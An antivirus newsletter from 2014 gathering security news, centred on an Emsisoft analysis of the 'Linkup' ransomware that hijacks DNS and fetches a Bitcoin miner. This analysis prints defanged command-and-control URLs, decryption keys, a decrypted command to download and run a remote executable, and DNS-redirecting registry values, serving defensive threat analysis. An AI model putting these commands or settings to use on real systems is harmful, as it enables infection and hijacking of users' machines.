Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Безопасность в небе: производство легендарных <<Су>> защищено <<Лабораторией Касперского>>


Антивирусный "хостинг"

Клуб пользователей антивирусных услуг (Saas, Cloud)

добавить на Яндекс
Антивирусы и безопасность (SaaS, Cloud ...)
av-host.net

Безопасность в небе: производство легендарных «Су» защищено «Лабораторией Касперского»
2014-02-03 16:59

KMM поделился ссылкой

Безопасность в небе: производство легендарных «Су» защищено «Лабораторией Касперского»

«Лаборатория Касперского» сообщает о начале сотрудничества с одной из ведущих российских авиационных компаний — ОАО «Компания «Сухой».


Malware Analysis: Ransomware “Linkup” Blocks DNS and Mines Bitcoins
2014-02-03 17:15

KMM поделился ссылкой

Malware Analysis: Ransomware “Linkup” Blocks DNS and Mines Bitcoins

locker-page-step3

Over the past week, the Emsisoft Malware Analysis team has been closely following a new ransomware Trojan variant that has been detected by Emsisoft Anti-Malware as Trojan-Ransom.Win32.Linkup.

“Linkup” is an interesting piece of ransomware, because unlike previous models it does not directly lock your computer or encrypt files.  Instead, Linkup blocks Internet access by modifying your DNS and can also turn your computer into a bitcoin mining robot.

 Protecting Yourself from Linkup

Users running Emsisoft Anti-Malware are automatically protected from Linkup, and should block the program when it is identified as Trojan-Ransom.Win32.Linkup.  Users who have been infected by Linkup will be blocked from Internet usage and will encounter the following “website” when attempting to browse.

locker-page-step1

What is encountered is the typical ransomware form, which in this case demands personal information and a payment method to unlock Internet usage.  The form states that you will only be charged EUR 0.01, but this is unconfirmed and most likely a blatant lie.  Do not submit any personal information!  If your computer has been infected, we advise you to find another means of connecting to the Internet and contacting Emsisoft Support to assist you with removal.

How Linkup Works

Once the Linkup Trojan has been executed, it makes a copy of itself in the %AppData%\Microsoft\Windows directory named svchost.exe, a fake name meant to mimic a normal file on your computer, which is located in %windir%\system32.  To mark its presence in the system, Linkup creates a mutex named tnd990r or tnd990s. We have also found that Linkup will actually disable selected Windows Security and Firewall services to facilitate infection.

new-disable-services

Once established on your PC, Linkup contacts its server to provide it with data related to your machine.  It does this by sending a POST request to the following address, transmitted in an encrypted state.

new-contacting-serverWhat kind of data is Linkup sending its server?  When decrypted the “token” value will look like this:

uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU
&wv=5.1.2600.SP3.0.256.1.2.x86&ia=1

That’s your unique user id (uid), your version of windows (ver), and the language you’re using — in this case ENU, or United States English.  This information helps facilitate infection, as Linkup must know what type of computer it is working with if it is to function.

Linkup also gives itself a layer of redundancy, so that if one host fails it can still communicate with another Command and Control server. Decryption reveals the following Command and Control hosts:

hxxp://62.75.221.37/uplink.php?logo.jpg

hxxp://hoseen45r.com/uplink.php?logo.jpg

hxxp://onetimes21s.com/uplink.php?logo.jpg

hxxp://setpec14rs.com/uplink.php?logo.jpg

Linkup decrypts the string with the following key:

IVW-Q3Xo5sBYzDTJK6LPuSrvEkAcghH8lw0GbfFe9dn_MRpqxONZam7ij2yUC14t

new-decrypt-body-string

Further analysis of Linkup’s body reveals another interesting string, which is actually another decryption key:

Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI

This key translates commands from Linkup’s server so that the malware can perform them. Upon initial connection, the very first command that is sent looks likes this:

nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV

Linkup decrypts this command using its key, turning it into this:

IL 62.75.221.37
RUN hxxp://91.220.163.22/pts2.exe

decryption

The first command (IL 62.75.221.37) redirects every HTTP request to the ransomware website, located at 62.75.221.37, addressed hxxp://62.75.221.37/worlds/test/index.html. At this point, Linkup will then begin to redirect your DNS so that you end up at the ransomware site whenever you browse.

To redirect every single DNS request, Linkup also makes several changes in the Windows registry, including modifying the following:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%
    "NameServer" = "127.0.0.1"
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%
    "DhcpNameServer" = "127.0.0.1"

Linkup then finalizes this action by refreshing various Internet/connectivity component settings, in order to ensure the changes it made are effective immediately.  It does this by running the following commands:

new-refresh-network

This redirect is malicious enough, but what it so interesting about Linkup is that it doesn’t stop there.  Note the second line of the initial command from the server: RUN hxxp://91.220.163.22/pts2.exe.  This command instructs your computer to download and run the file pts2.exe.  What’s pts2.exe?  A downloader designed to connect your computer to a Bitcoin mining botnet!

Bitcoin Mining Botnet?

The technical processes behind “Bitcoin mining” are complex.  For a good summary, consider reading Ken Tiddel’s “Geeks Love The Bitcoin Phenomenon Like They Loved the Internet in 1995,” or Emsisoft’s  Attack on Bitcoins.

In the case of Linkup, the most important thing to understand about Bitcoin mining is that if a hacker can get more computing power, he can earn more Bitcoins.  That’s why in addition to blocking Internet browsing, Linkup also attempts to connect your computer to a Bitcoin mining botnet, which can combine the computing power of multiple infected computers to earn new Bitcoins for whoever is behind the attack.

Pts2.exe is a downloader, and it’s placed in the same directory as the fake svchost.exe file we started this analysis out with.  Behind the scenes, pts2.exe is actually formatted as Update_%random%.exe.  This is a .NET based file designed to download and execute another file from hxxp://64.32.28.155/b.exe and store it in C:\Users\Public\b.exe.

pts2-downloaderUpon further analysis, our malware team identified this “other file” to be a self-extracting RAR that extracts several script files and one executable.  The SFX script executes a 64-bit PE file, named j.exe, which is jhProtominer. As the name suggests, jhProtominer is a Bitcoin mining application.

This combination of ransomware and Bitcoin mining is a new and fascinating development.  At this point, however, its functionality is still quite limited as the downloaded jhProtominer only works on 64-bit operating systems.  In time, it will be interesting to see if Linkup is modified to download more flexible variants.

Hashes of files analyzed in this article

  • Trojan-Ransom.Win32.Linkup
    MD5: f1304992523cd68f7412a355d2fb9d5d
    SHA1: ce70e50707b456e0e2f086126bdcfa266d5a57ae
  • pts2.exe (Bitcoin miner downloader)
    MD5: 7eb809d8ea5bfe602648752289669632
    SHA1: 20bd75b9c47ac075d51783a5f3c5309091c7c6a7
  •  b.exe (Bitcoin miner package – Self-extracting Archive)
    MD5: 29eea4cd040bff1028d5b6092f22f9bf
    SHA1: 1b3389328f9ebf706f09445ca0adc5efd2e98f79
  •  j.exe (jhProtominer)
    MD5: 2e9a71e4ee33d190056e081e6726fa56
    SHA1: db355fc276b8174e1753f45dbdf52536f7740316

What do you think about Linkup?

In the coming weeks, Emsisoft’s Malware Analysis team will be keeping a close eye on Linkup, as the malware will inevitably evolve. We have provided this analysis because Linkup represents a new approach to infection, which combines two known techniques — ransomware and Bitcoin mining — to create one potent form of money making malware.

If you have any questions about Linkup, we encourage you to contact Emsisoft Support directly. There, you can share your thoughts or even your own discoveries to help Emsisoft in its mission of making the world a more malware-free place.  In the meantime, steer clear of the mines, and have a great (ransomware-free) day!

 



Обновление плагинов для браузеров в Dr.Web Enterprise Security Suite 6.0.4
2014-02-03 21:24

KMM поделился ссылкой

Обновление плагинов для браузеров в Dr.Web Enterprise Security Suite 6.0.4

3 февраля 2014 года

Компания «Доктор Веб» сообщает об обновлении плагинов (6.00.01240) для браузеров Google Chrome и Mozilla Firefox в Центре управления Dr.Web Enterprise Security Suite версии 6.0.4 и об исправлении для работы плагина с браузером MS Internet Explorer 11. Обновление связано с исправлением выявленных ошибок.

В обновленных плагинах устранена проблема инсталляции антивирусных агентов через Центр управления по сети, возникавшая при вводе в поле «Исполняемый файл» нелатинских символов с использованием браузеров Google Chrome или Mozilla Firefox.

Для корректной работы плагина с браузером MS Internet Explorer 11 выпущены исправления с инструкциями по их применению.

Обновленные плагины необходимо загрузить с сайта «Доктор Веб».



В избранное